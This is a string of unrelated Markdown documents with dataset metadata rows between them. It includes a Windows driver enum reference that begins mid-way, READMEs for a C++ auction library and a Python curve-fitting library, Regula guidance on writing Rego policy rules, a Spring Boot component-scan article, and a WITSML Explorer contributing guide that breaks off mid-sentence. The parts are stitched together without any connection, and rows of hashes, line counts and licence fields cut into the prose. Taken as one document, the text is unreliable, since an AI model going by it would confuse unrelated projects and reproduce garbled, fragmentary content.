DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_2_525I      = 0x00000002, DXGKMDT_OPM_PROTECTION_STANDARD_IEC62375_625P        = 0x00000004, DXGKMDT_OPM_PROTECTION_STANDARD_EIA608B_525          = 0x00000008, DXGKMDT_OPM_PROTECTION_STANDARD_EN300294_625I        = 0x00000010, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_525P   = 0x00000020, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_750P   = 0x00000040, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_1125I  = 0x00000080, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_525P   = 0x00000100, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_750P   = 0x00000200, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_1125I  = 0x00000400, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525I       = 0x00000800, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525P       = 0x00001000, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_750P       = 0x00002000, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_1125I      = 0x00004000 } DXGKMDT_OPM_PROTECTION_STANDARD; ```` ## -enum-fields ### -field DXGKMDT_OPM_PROTECTION_STANDARD_OTHER Indicates a protected television signal type other than those given in the following constants of this enumeration. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_NONE Indicates that the video output does not support protection for any television signals. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_525I Indicates that the video output supports the IEC61880_525I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_2_525I Indicates that the video output supports the IEC61880_2_525I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_IEC62375_625P Indicates that the video output supports the IEC62375_625P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_EIA608B_525 Indicates that the video output supports the EIA608B_525 standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_EN300294_625I Indicates that the video output supports the EN300294_625I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_525P Indicates that the video output supports the CEA805A_TYPEA_525P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_750P Indicates that the video output supports the CEA805A_TYPEA_750P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_1125I Indicates that the video output supports the CEA805A_TYPEA_1125I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_525P Indicates that the video output supports the CEA805A_TYPEB_525P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_750P Indicates that the video output supports the CEA805A_TYPEB_750P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_1125I Indicates that the video output supports the CEA805A_TYPEB_1125I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525I Indicates that the video output supports the ARIBTRB15_525I standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525P Indicates that the video output supports the ARIBTRB15_525P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_750P Indicates that the video output supports the ARIBTRB15_750P standard. ### -field DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_1125I Indicates that the video output supports the ARIBTRB15_1125I standard. ## -see-also <a href="..\dispmprt\nc-dispmprt-dxgkddi_opm_get_copp_compatible_information.md">DxgkDdiOPMGetCOPPCompatibleInformation</a> <a href="..\dispmprt\nc-dispmprt-dxgkddi_opm_configure_protected_output.md">DxgkDdiOPMConfigureProtectedOutput</a> <a href="..\d3dkmdt\ns-d3dkmdt-_dxgkmdt_opm_acp_and_cgmsa_signaling.md">DXGKMDT_OPM_ACP_AND_CGMSA_SIGNALING</a> <a href="..\d3dkmdt\ns-d3dkmdt-_dxgkmdt_opm_set_acp_and_cgmsa_signaling_parameters.md">DXGKMDT_OPM_SET_ACP_AND_CGMSA_SIGNALING_PARAMETERS</a> <a href="..\dispmprt\nc-dispmprt-dxgkddi_opm_get_information.md">DxgkDdiOPMGetInformation</a>    
38.59596
2,047
0.856713
yue_Hant
0.829626
485640963a7a9cce1348a7dbe7480d574b414201
2,915
md
Markdown
README.md
mindpowered/english-auction-cpp
58f4c23c2abee4a8e58b3af90ddf988a250559aa
[ "MIT" ]
null
null
null
README.md
mindpowered/english-auction-cpp
58f4c23c2abee4a8e58b3af90ddf988a250559aa
[ "MIT" ]
null
null
null
README.md
mindpowered/english-auction-cpp
58f4c23c2abee4a8e58b3af90ddf988a250559aa
[ "MIT" ]
null
null
null
englishauction ============== Online auctions with ascending price and time limit ![Build Status](https://mindpowered.dev/assets/images/github-badges/build-passing.svg) Contents ======== * [Source Code and Documentation](#source-code-and-documentation) * [About](#about) * [Requirements](#requirements) * [Installation](#installation) * [Usage](#usage) * [Support](#support) * [Licensing](#licensing) # Source Code and Documentation - Source Code: [https://github.com/mindpowered/english-auction-cpp](https://github.com/mindpowered/english-auction-cpp) - Documentation: [https://mindpowered.github.io/english-auction-cpp](https://mindpowered.github.io/english-auction-cpp) # About An English auction is the most common form of auction. When an auction opens, the price starts low and increases as buyers bid for the item. Live auctions usually end when there is no new highest bid for a period of time. For online auctions, an end time is usually set. To prevent items selling for a loss, sometimes the seller will place a reserve. A reserve is the least amount to sell the item for, although the auction may start at a lower price. Another common feature of online auctions is the ability to pay a set price to win and end the auction. This package aims to provide functionality of online English auctions. # Requirements - Bazel - https://www.bazel.build/ - Haxe 4.1.1 - Neko - hxcpp - https://lib.haxe.org/p/hxcpp/ - g++ Third-party dependencies may have additional requirements. # Installation Add rules to WORKSPACE file ... ``` load("@bazel_tools//tools/build_defs/repo:git.bzl", "git_repository") git_repository( name = 'maglev', remote = 'https://github.com/mindpowered/maglev-cpp.git', branch = 'master', ) git_repository( name = 'haxecpp', remote = 'https://github.com/mindpowered/haxecpp-cpp.git', branch = 'master', ) git_repository( name = 'englishauction', remote = 'https://github.com/mindpowered/english-auction-cpp.git', branch = 'master', ) ``` Reference dependency in BUILD file ... ``` deps = [ ... "@englishauction//:englishauction" ... ], ``` # Usage ```cpp #include <mindpowered/englishauction/EnglishAuction.h> { auto ea = new EnglishAuction(); ea->GetOpenAuctions(0, 10, "start", true); delete ea; } ``` # Support We are here to support using this package. If it doesn't do what you're looking for, isn't working, or you just need help, please [Contact us][contact]. There is also a public [Issue Tracker][bugs] available for this package. # Licensing This package is released under the MIT License. [bugs]: https://github.com/mindpowered/english-auction-cpp/issues [contact]: https://mindpowered.dev/support/?ref=english-auction-cpp/ [docs]: https://mindpowered.github.io/english-auction-cpp/ [licensing]: https://mindpowered.dev/?ref=english-auction-cpp [purchase]: https://mindpowered.dev/purchase/
29.15
555
0.724528
eng_Latn
0.84058
4857ad50fbd4d730489ce4355963ef3a772ae985
926
md
Markdown
README.md
google/pwlfit
ee64c2203cd71d0fd699a59ba62044f76d9db293
[ "Apache-2.0" ]
23
2020-01-31T19:28:04.000Z
2022-01-11T16:57:57.000Z
README.md
google/pwlfit
ee64c2203cd71d0fd699a59ba62044f76d9db293
[ "Apache-2.0" ]
null
null
null
README.md
google/pwlfit
ee64c2203cd71d0fd699a59ba62044f76d9db293
[ "Apache-2.0" ]
4
2020-10-13T16:59:44.000Z
2021-08-09T10:29:25.000Z
# About PWLFit is a small library to fit data with a piecewise linear function. This is not an officially supported Google product. # Example usage: ## Fitting a two-segment line ```python import numpy as np from pwlfit import fitter from pwlfit import utils # Generate a somewhat noisy data to fit: xs = np.arange(0, 5, 0.05) xs += np.random.normal(size=len(xs)) xs = np.sort(xs) ys = 3 * np.power(xs - 1, 2) + xs - 1 ys += np.random.normal(scale=3, size=len(xs)) # Fit and evaluate. curve = fitter.fit_pwl(xs, ys, num_segments=2) print(curve) print('MSE: ', np.sum((ys - curve.eval(xs)) **2.0) / len(ys)) ``` ![Example](./plots/example_1.png) ## Fitting a non-monotonic two-segment line. ```python xs = np.arange(100) ys = np.concatenate((np.arange(50), np.arange(50, 0, -1))) curve = fitter.fit_pwl(xs, ys, num_segments=2, mono=False) print(curve) print('MSE: ', np.sum((ys - curve.eval(xs)) **2.0) / len(ys)) ```
23.74359
71
0.676026
eng_Latn
0.801051
48584975452ea44339a57d9614fb6eca51c4ac69
821
md
Markdown
aspnet/signalr/videos/getting-started/signalr-and-web-sockets.md
terrajobst/AspNetDocs.es-es
77be7c56042efbb27a9e051e21ee16792853ab63
[ "CC-BY-4.0", "MIT" ]
null
null
null
aspnet/signalr/videos/getting-started/signalr-and-web-sockets.md
terrajobst/AspNetDocs.es-es
77be7c56042efbb27a9e051e21ee16792853ab63
[ "CC-BY-4.0", "MIT" ]
null
null
null
aspnet/signalr/videos/getting-started/signalr-and-web-sockets.md
terrajobst/AspNetDocs.es-es
77be7c56042efbb27a9e051e21ee16792853ab63
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- uid: signalr/videos/getting-started/signalr-and-web-sockets title: Signalr y Sockets Web | Microsoft Docs author: shanselman description: Scott Hanselman presenta los sockets de Signalr y Web. ms.author: bradyg ms.date: 08/15/2012 ms.assetid: d20b4bfc-2cc1-4aeb-b235-733146df1eca msc.legacyurl: /signalr/videos/getting-started/signalr-and-web-sockets msc.type: video ms.openlocfilehash: 00588e910ae93a80dc3a91ca2ed6a37176f13a8e ms.sourcegitcommit: e7e91932a6e91a63e2e46417626f39d6b244a3ab ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 03/06/2020 ms.locfileid: "78449791" --- # <a name="signalr-and-web-sockets"></a>SignalR y Web Sockets por [Scott Hanselman](https://github.com/shanselman) [&#9654;Ver vídeo (6 minutos)](https://channel9.msdn.com/Blogs/ASP-NET-Site-Videos/signalr-and-web-sockets)
35.695652
107
0.799026
yue_Hant
0.188749
4858bee00156bde51d47aef05b29962806cc8074
7,730
md
Markdown
docs/src/development/writing-rules.md
auspex-labs/regula
3744d7e64fac1ace1df01a2e2936d5d3ef5b51b6
[ "Apache-2.0" ]
null
null
null
docs/src/development/writing-rules.md
auspex-labs/regula
3744d7e64fac1ace1df01a2e2936d5d3ef5b51b6
[ "Apache-2.0" ]
null
null
null
docs/src/development/writing-rules.md
auspex-labs/regula
3744d7e64fac1ace1df01a2e2936d5d3ef5b51b6
[ "Apache-2.0" ]
null
null
null
# Writing Rules Custom rule development generally has four parts: - Writing the IaC to be used as [test input](test-inputs.md) - Writing the rule (as documented on this page!) - Writing the [rule tests](writing-tests.md) - [Testing](testing-rules.md) the rules ## Types of rules !!! tip For a tutorial on writing a simple custom rule, see [Example: Writing a Simple Rule](../examples/writing-a-rule.md). Regula rules are written in [Rego](https://www.openpolicyagent.org/docs/latest/policy-language/) and use the same format as [Fugue Custom Rules](https://docs.fugue.co/rules.html). This means there are (currently) two kinds of rules: simple rules and advanced rules. ## Simple rules Simple rules are useful when the policy applies to a single resource type only, and you want to make simple yes/no decision. ```ruby # Rules must always be located right below the `rules` package. package rules.my_simple_rule # Simple rules must specify the resource type they will police. resource_type = "aws_ebs_volume" # Simple rules must specify `allow` or `deny`. For this example, we use # an `allow` rule to check that the EBS volume is encrypted. default allow = false allow { input.encrypted == true } ``` ### Custom error messages and attributes (simple rules) If you want to return more information to the user, you can also define a custom error message in a simple rule. This is done by writing a `deny[msg]` style rule. ```ruby package rules.simple_rule_custom_message resource_type = "aws_ebs_volume" deny[msg] { not input.encrypted msg = "EBS volumes should be encrypted" } ``` ## Advanced rules Advanced rules are harder to write, but more powerful. They allow you to observe different kinds of resource types and decide which specific resources are valid or invalid. ```ruby # Rules still must be located in the `rules` package. package rules.user_attached_policy # Advanced rules typically use functions from the `fugue` library. import data.fugue # We mark an advanced rule by setting `resource_type` to `MULTIPLE`. resource_type = "MULTIPLE" # `fugue.resources` is a function that allows querying for resources of a # specific type. In our case, we are just going to ask for the EBS volumes # again. ebs_volumes = fugue.resources("aws_ebs_volume") # Auxiliary function. is_encrypted(resource) { resource.encrypted == true } # Regula expects advanced rules to contain a `policy` rule that holds a set # of _judgements_. policy[p] { resource = ebs_volumes[_] is_encrypted(resource) p = fugue.allow_resource(resource) } { resource = ebs_volumes[_] not is_encrypted(resource) p = fugue.deny_resource(resource) } ``` The `fugue` API consists of these functions for advanced rules: - `fugue.resources(resource_type)` returns an object with all resources of the requested type. - `fugue.allow_resource(resource)` marks a resource as valid. - `fugue.deny_resource(resource)` marks a resource as invalid. - `fugue.deny_resource_with_message(resource, msg)` marks a resource as invalid and displays a custom `rule_message` in the report. - `fugue.missing_resource(resource_type)` marks a resource as **missing**. This is useful if you for example _require_ a log group to be present. - `fugue.missing_resource_with_message(resource_type, msg)` marks a resource as **missing** and displays a custom `rule_message` in the report. ### Custom error messages (advanced rules) As stated above, the functions `fugue.deny_resource_with_message(resource, msg)` and `fugue.missing_resource_with_message(resource_type, msg)` allow Regula to display a custom `rule_message` in its report. This rule demonstrates both functions: ```ruby hl_lines="17 21" package rules.account_password_policy import data.fugue resource_type = "MULTIPLE" password_policies = fugue.resources("aws_iam_account_password_policy") policy[r] { password_policy = password_policies[_] password_policy.minimum_password_length >= 16 r = fugue.allow_resource(password_policy) } { password_policy = password_policies[_] not password_policy.minimum_password_length >= 16 msg = "Password policy is too short. It must be at least 16 characters." r = fugue.deny_resource_with_message(password_policy, msg) } { count(password_policies) == 0 msg = "No password policy exists." r = fugue.missing_resource_with_message("aws_iam_account_password_policy", msg) } ``` Here's an example rule result demonstrating a missing resource message: ```json hl_lines="12" { "controls": [ "CORPORATE-POLICY_1.1" ], "filepath": "main.tf", "input_type": "tf", "provider": "", "resource_id": "", "resource_type": "aws_iam_account_password_policy", "rule_description": "Per company policy, an AWS account must have a password policy, and it must require a minimum of 16 characters", "rule_id": "CUSTOM_0001", "rule_message": "No password policy exists.", "rule_name": "account_password_policy", "rule_result": "FAIL", "rule_severity": "Medium", "rule_summary": "An AWS account must have a password policy requiring a minimum of 16 characters" }, ``` ## Adding rule metadata You can add metadata to a rule to enhance Regula's [report](../report.md): ```ruby __rego__metadoc__ := { "id": "CUSTOM_0001", "title": "IAM policies must have a description of at least 25 characters", "description": "Per company policy, it is required for all IAM policies to have a description of at least 25 characters.", "custom": { "controls": { "CORPORATE-POLICY": [ "CORPORATE-POLICY_1.1" ] }, "severity": "Low" } } ``` Regula supports the following metadata properties: - `id`: Rule ID - `title`: Short summary of the rule - `description`: Longer description of the rule - `controls`: An object where the key is the compliance family name and the value is an array of controls - `severity`: One of `Critical`, `High`, `Medium`, `Low`, `Informational` Here's an example rule result to show how this metadata looks in the report: ```json { "controls": [ "CORPORATE-POLICY_1.1" ], "filepath": "../regula-ci-example/infra_tf/", "input_type": "tf", "provider": "aws", "resource_id": "aws_iam_policy.basically_allow_all", "resource_type": "aws_iam_policy", "rule_description": "Per company policy, it is required for all IAM policies to have a description of at least 25 characters.", "rule_id": "CUSTOM_0001", "rule_message": "", "rule_name": "long_description", "rule_result": "FAIL", "rule_severity": "Low", "rule_summary": "IAM policies must have a description of at least 25 characters" } ``` ## CloudFormation vs. Terraform rules CloudFormation rules are written the same way Terraform rules are, but require the line `input_type := "cfn"`, as shown in the simple rule below: ```ruby hl_lines="3" package rules.cfn_ebs_volume_encryption input_type := "cfn" resource_type := "AWS::EC2::Volume" default allow = false allow { input.Encrypted == true } ``` Terraform rules do not require `input_type` to be explicitly set. Additionally, the `resource_type` is specified differently for CloudFormation and Terraform: - [CloudFormation resource types](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-template-resource-type-ref.html) (e.g., `AWS::EC2::Instance`) - Terraform [AWS](https://registry.terraform.io/providers/hashicorp/aws/latest/docs), [Azure](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs), [Google Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs) resource types (e.g., `aws_instance`)
34.20354
288
0.728719
eng_Latn
0.948275
4858cdc077b0039fecb3617d93dd659db87973eb
434
md
Markdown
content/cli/orgsecret/drone-orgsecret-info.md
phil-davis/docs
f3db0b46c949586e50a6323051d33362fb4518de
[ "BlueOak-1.0.0" ]
151
2015-01-30T23:32:00.000Z
2022-02-20T20:23:46.000Z
content/cli/orgsecret/drone-orgsecret-info.md
phil-davis/docs
f3db0b46c949586e50a6323051d33362fb4518de
[ "BlueOak-1.0.0" ]
339
2015-01-04T05:21:48.000Z
2022-03-26T07:08:04.000Z
content/cli/orgsecret/drone-orgsecret-info.md
phil-davis/docs
f3db0b46c949586e50a6323051d33362fb4518de
[ "BlueOak-1.0.0" ]
386
2015-01-04T05:08:19.000Z
2022-03-29T19:05:10.000Z
--- date: 2000-01-01T00:00:00+00:00 title: drone orgsecret info author: bradrydzewski weight: 5 --- This subcommand prints the organization secret metadata to the console. Please note this command requires system administrator privileges. ``` NAME: drone orgsecret info - display secret info USAGE: drone orgsecret info [command options] [organization] [name] ``` Example usage: ``` $ drone orgsecret info acme my_token ```
19.727273
138
0.748848
eng_Latn
0.814912
4858ff1694b11f1e90ac02bdd1672fbf2c36e10c
338
md
Markdown
windows.foundation.metadata/contractversionattribute.md
gbaychev/winrt-api
25346cd51bc9d24c8c4371dc59768e039eaf02f1
[ "CC-BY-4.0", "MIT" ]
199
2017-02-09T23:13:51.000Z
2022-03-28T15:56:12.000Z
windows.foundation.metadata/contractversionattribute.md
gbaychev/winrt-api
25346cd51bc9d24c8c4371dc59768e039eaf02f1
[ "CC-BY-4.0", "MIT" ]
2,093
2017-02-09T21:52:45.000Z
2022-03-25T22:23:18.000Z
windows.foundation.metadata/contractversionattribute.md
gbaychev/winrt-api
25346cd51bc9d24c8c4371dc59768e039eaf02f1
[ "CC-BY-4.0", "MIT" ]
620
2017-02-08T19:19:44.000Z
2022-03-29T11:38:25.000Z
--- -api-id: T:Windows.Foundation.Metadata.ContractVersionAttribute -api-type: winrt class --- <!-- Class syntax. public class ContractVersionAttribute : Attribute, Attribute --> # Windows.Foundation.Metadata.ContractVersionAttribute ## -description Indicates the version of the API contract. ## -remarks ## -see-also ## -examples
16.095238
63
0.748521
eng_Latn
0.48534
48590ff1efe09884c221bfa7bcad339582de29a7
1,118
md
Markdown
backend/README.md
bauer01/aws-workshop
4d88a482c24a66054aa0ab1ba71e28c76c5280f7
[ "MIT" ]
28
2020-12-02T18:47:56.000Z
2022-03-07T13:07:52.000Z
backend/README.md
bauer01/aws-workshop
4d88a482c24a66054aa0ab1ba71e28c76c5280f7
[ "MIT" ]
65
2021-06-07T19:44:34.000Z
2022-03-27T23:43:17.000Z
backend/README.md
bauer01/aws-workshop
4d88a482c24a66054aa0ab1ba71e28c76c5280f7
[ "MIT" ]
2
2021-05-20T21:09:19.000Z
2021-08-02T12:30:44.000Z
![Purple Stack Title Image](https://user-images.githubusercontent.com/6282843/99382243-8a14f200-28cc-11eb-99b1-114f4842874b.png) # Backend Backend for Purple Apps is an arbitrary number of serverless serivces which handle background processes like State machines, DynamoDB triggers, webhook handlers, etc. Part of the backend is also the `resources` package which contains all resources like DynamoDB tables, S3 byckets, Cognito User Pools, etc. Example: ``` backend ├── addTodo - package @be/add-todo │   ├── jest.config.js │   ├── macros.js │   ├── package-lock.json │   ├── package.json │   ├── serverless.yml │   ├── src │   │   └── add │   │   ├── __io__ │   │   ├── index.ts │   │   └── types.ts │   ├── tsconfig.json │   ├── tsconfig.test.json │   └── webpack.config.js └── resources - package @be-prioritized/resources ├── jest.config.js ├── macros.js ├── package-lock.json ├── package.json ├── serverless.yml ├── tsconfig.json ├── tsconfig.test.json └── webpack.config.js ``` ## Deployment Check out deployment flow of backend [HERE](../README.md#deployment)
27.95
166
0.655635
eng_Latn
0.534209
4859cfc30e585468dd2e074d28ceed06ddd5404d
39
md
Markdown
README.md
jeyakartheesan/Design-pattern-in-java
b5698b7e008b537c8c07d95a3a7ec6e55254b7dc
[ "MIT" ]
null
null
null
README.md
jeyakartheesan/Design-pattern-in-java
b5698b7e008b537c8c07d95a3a7ec6e55254b7dc
[ "MIT" ]
null
null
null
README.md
jeyakartheesan/Design-pattern-in-java
b5698b7e008b537c8c07d95a3a7ec6e55254b7dc
[ "MIT" ]
null
null
null
# Design-pattern-in-java java pattern
13
24
0.769231
ita_Latn
0.527441
4859d353d2b97b42c35b84a066af4597bf9ba5a6
111
md
Markdown
.changeset/big-cups-exist.md
PH4NTOMiki/kit
4e4625ea6d9a084bc767ae216704aacd95fe8730
[ "MIT" ]
null
null
null
.changeset/big-cups-exist.md
PH4NTOMiki/kit
4e4625ea6d9a084bc767ae216704aacd95fe8730
[ "MIT" ]
null
null
null
.changeset/big-cups-exist.md
PH4NTOMiki/kit
4e4625ea6d9a084bc767ae216704aacd95fe8730
[ "MIT" ]
null
null
null
--- '@sveltejs/kit': patch --- [breaking] remove amp config option in favour of amp.transform helper function
18.5
78
0.72973
eng_Latn
0.846367
485a06b36917b65c66425c7e8b82ee83ef2229ca
7,583
md
Markdown
_posts/2017-12-21-spring-boot-and-component-scan-top20.md
lanaflonPerso/in28minutes.github.io
aeab4d2e05da9f058da86cd0e33421cdeba82491
[ "MIT" ]
1
2020-02-21T14:00:24.000Z
2020-02-21T14:00:24.000Z
_posts/2017-12-21-spring-boot-and-component-scan-top20.md
viczer/in28minutes.github.io
6d09c86c79d901cf8df224c4542e7b1e86563d45
[ "MIT" ]
null
null
null
_posts/2017-12-21-spring-boot-and-component-scan-top20.md
viczer/in28minutes.github.io
6d09c86c79d901cf8df224c4542e7b1e86563d45
[ "MIT" ]
1
2020-01-04T10:30:54.000Z
2020-01-04T10:30:54.000Z
--- layout: post title: Spring, Spring Boot and Component Scan date: 2017-12-21 12:31:19 summary: Understand the most important concept in Spring Framework - Component Scan. Let's see how you can configure a Component Scan in Spring and Spring Boot. We will also look at how you can debug problems related to Component Scan. categories: SpringBoot permalink: /spring-boot-and-component-scan --- This guide will help you understand the most important concept in Spring - Component Scan. Spring Boot does some magic around Component Scan. Let's understand that in this article. ## You will learn - What is Component Scan? - Why is Component Scan important? - Which packages does Spring Boot do a Component Scan automatically? - How do you define Component Scan with Spring Boot? - How do you resolve problems involving Component Scan? ## Free Courses - Learn in 10 Steps - [FREE 5 DAY CHALLENGE - Learn Spring and Spring Boot](https://links.in28minutes.com/SBT-Page-Top-LearningChallenge-SpringBoot){:target="_blank"} - [Learn Spring Boot in 10 Steps](https://links.in28minutes.com/in28minutes-10steps-springboot){:target="_blank"} - [Learn Docker in 10 Steps](https://links.in28minutes.com/in28minutes-10steps-docker){:target="_blank"} - [Learn Kubernetes in 10 Steps](https://links.in28minutes.com/in28minutes-10steps-k8s){:target="_blank"} - [Learn AWS in 10 Steps](https://links.in28minutes.com/in28minutes-10steps-aws-beanstalk){:target="_blank"} ### @ComponentScan If you understand component scan, you understand Spring. Spring is a dependency injection framework. It is all about beans and wiring in dependencies. The first step of defining Spring Beans is by adding the right annotation - @Component or @Service or @Repository. However, Spring does not know about the bean unless it knows where to search for it. > This part of "telling Spring where to search" is called a Component Scan. You define the packages that have to be scanned. Once you define a Component Scan for a package, Spring would search the package and all its sub packages for components/beans. Defining a Component Scan - If you are using Spring Boot, check configuration in Approach 1. - If you are doing a JSP/Servlet or a Spring MVC application without using Spring Boot use Approach 2. ## Approach 1 : Component Scan in a Spring Boot Project Executive Summary - If your other packages hierarchies are below your main app with the @SpringBootApplication annotation, you're covered by implicit components scan. - If there are beans/components in other packages which are not sub packages of the main package, you should manually add them as @ComponentScan ####### Detailed Example Consider the class below: ``` package com.in28minutes.springboot.basics.springbootin10steps; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.context.ApplicationContext; import org.springframework.context.ConfigurableApplicationContext; @SpringBootApplication public class SpringbootIn10StepsApplication { public static void main(String[] args) { ApplicationContext applicationContext = SpringApplication.run(SpringbootIn10StepsApplication.class, args); for (String name : applicationContext.getBeanDefinitionNames()) { System.out.println(name); } } } ``` ```@SpringBootApplication``` is defined on ```SpringbootIn10StepsApplication class``` which is package ```com.in28minutes.springboot.basics.springbootin10steps.``` ```@SpringBootApplication``` defines an automatic component scan on package ```com.in28minutes.springboot.basics.springbootin10steps```. You are fine if all your components are defined in the above package or a sub-package of it. However, let's say one of the components is defined in a package ```com.in28minutes.springboot.somethingelse``` In this case, you would need add the new package into component scan. Two Options - Define @ComponentScan(“com.in28minutes.springboot”) - This would scan the entire parent tree of com.in28minutes.springboot. - Or Define two specific Component Scans by using an array. - @ComponentScan({"com.in28minutes.springboot.basics.springbootin10steps","com.in28minutes.springboot.somethingelse"}) Option 1 ``` @ComponentScan(“com.in28minutes.springboot”) @SpringBootApplication public class SpringbootIn10StepsApplication { ``` Option 2 ``` @ComponentScan({"com.in28minutes.springboot.basics.springbootin10steps","com.in28minutes.springboot.somethingelse"}) @SpringBootApplication public class SpringbootIn10StepsApplication { ``` ### Approach 2: Non Spring Boot Project In a non Spring Boot Project, we would typically define the component scan explicitly in an XML application context or a Java Application Context. ####### Java Application Context Option 1 ``` @ComponentScan(“com.in28minutes) @Configuration public class SpringConfiguration { ``` Option 2 ``` @ComponentScan({"com.in28minutes.package1","com.in28minutes.package2"}) @Configuration public class SpringConfiguration { ``` --- ***85,000 subscribers*** are learning AWS, Docker, Kubernetes, Spring Boot and Microservices on our ***Youtube Channel***. &nbsp; [***SUBSCRIBE*** and Start Learning Now!](https://links.in28minutes.com/in28minute-YT-Subscribe){:target="_blank"} --- ####### XML Application Context ``` <context:component-scan base-package="com.in28minutes" /> ``` or Specific Multiple Packages ``` <context:component-scan base-package="com.in28minutes.package1, com.in28minutes.package2" /> ``` ### Errors related to Component Scan #### URL Not working Server starts up fine but - My URL is not working - My login url is not working - My todo url is not working ``` WARNING: No mapping found for HTTP request with URI [/spring-mvc/login] in DispatcherServlet with name 'dispatcher' WARNING: No mapping found for HTTP request with URI [/login] in DispatcherServlet with name 'dispatcher' WARNING: No mapping found for HTTP request with URI [/list-todos] in DispatcherServlet with name 'dispatcher' ``` #### No qualifying bean of type found ``` No qualifying bean of type [com.in28minutes.springboot.jpa.UserRepository] found for dependency [com.in28minutes.springboot.jpa.UserRepository]: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)} ``` > Same root cause for both above problems - The component is not being picked up. Three possible things you would need to look at a. You have not added the right annotation - @Controller, @Repository or @Controller b. You have not added a component scan. c. The package of your component is not defined in component scan. You have two options 1) Add the annotation or component scan 2) Move the component to a package already under component scan #### What is the difference between @Component and @ComponentScan? @Component and @ComponentScan are for different purposes. - @Component indicates that a class might be a candidate for creating a bean. Its like putting a hand up. - @ComponentScan is searching packages for Components. Trying to find out who all put their hands up. > Congratulations! You are reading an article from a series of 50+ articles on Spring, Spring Boot , Hibernate, Full Stack, Cloud and Microservices. We also have 20+ projects on our Github repository. For the complete series of 50+ articles and code examples, [click here](https://www.springboottutorial.com/tags/#SpringBoot).
39.290155
326
0.777265
eng_Latn
0.958987
485a213efd413dd0f6dfffcd88a21ffa4257f451
12,452
md
Markdown
CONTRIBUTING.md
markfarnan/witsml-explorer
fd9bac36d7374772f721117f2edababae3354fd4
[ "Apache-2.0" ]
2
2021-01-14T11:39:10.000Z
2021-01-16T10:35:05.000Z
CONTRIBUTING.md
markfarnan/witsml-explorer
fd9bac36d7374772f721117f2edababae3354fd4
[ "Apache-2.0" ]
null
null
null
CONTRIBUTING.md
markfarnan/witsml-explorer
fd9bac36d7374772f721117f2edababae3354fd4
[ "Apache-2.0" ]
null
null
null
# Contributing to WITSML Explorer The goal is to make a tool that will fulfill most of the needs regarding managing data on WITSML servers. A good data management tool will simplify the process of improving data quality, which often is generally poor and limits the applications for using the data. By opening the source code we can do this together with other organizations and individuals, and hopefully create a tool that can be used by everyone who need to browse and edit data on WITSML servers. WITSML Explorer (WE) is still in its infant days, and there is a lot of features and improvements to be made. Contributions are welcome and greatly appreciated :clap: ## What kind of contributions do we need Feel free to file new issues for bugs, suggest feature requests or improvements and so on. If you wish to contribute with coding please have a look at our [project board](https://github.com/equinor/witsml-explorer/projects/1). Issues that are in the TODO column should be ready to go, assign it to yourself and start working on it :computer: Especially the ones labeled as a `good first issue` might be a good start. Other issues might need som discussion or clarification before it can be started on, give us your thoughts or suggestions on something you would like to work on, and we can take it from there :smiley: ## Contribution process We use a [fork and pull request workflow](https://github.com/susam/gitpr). Fork the repo, and get going! Templates for both issues and pull requests are used. They both provide a check list that indicates what we hope to see present. Not all checkpoints will be applicable for all issues/PRs, but checking of as many boxes as possible is a good start. When a PR is opened, a CI job will be run to verify that everything is being built, tested and linted properly. After the CI job is passed, a review will be done. A maintainer will merge the PR when all is good :thumbsup: ## Set up development environment After forking the repo to your own github account, do the following: ``` # Clone the repo git clone git@github.com:<yourgithubaccount>/witsml-explorer.git # Step into local repo cd witsml-explorer # Create your own local mysettings.json file (not to be tracked in git) cd Src/WitsmlExplorer.Api/ cp appsettings.json mysettings.json ``` ### Using MongoDB _Note: WE also supports Cosmos DB, but that requires a little more setup, see the [CosmosDB setup guide](#Cosmos-database)._ To quickly get a development database up and running, a MongoDB docker image can be used. ``` # From the project root, cd to cd Docker/MongoDb ``` Add an initial db username and password by editing the `docker-compose.yml` file and setting `MONGO_INITDB_ROOT_USERNAME` and `MONGO_INITDB_ROOT_PASSWORD` (no space after `=`). ``` # Pull and run a default MongoDB locally docker-compose up -d ``` The default is to mount a volume in the same directory, but that can be changed in the `docker-compose.yml` file based on your preference. After execution `docker-compose up -d `, once, you can reset docker-compose.yml as the environment settings only is required the first time you run your mongoDb. Add the following configuration to `mysettings.json` 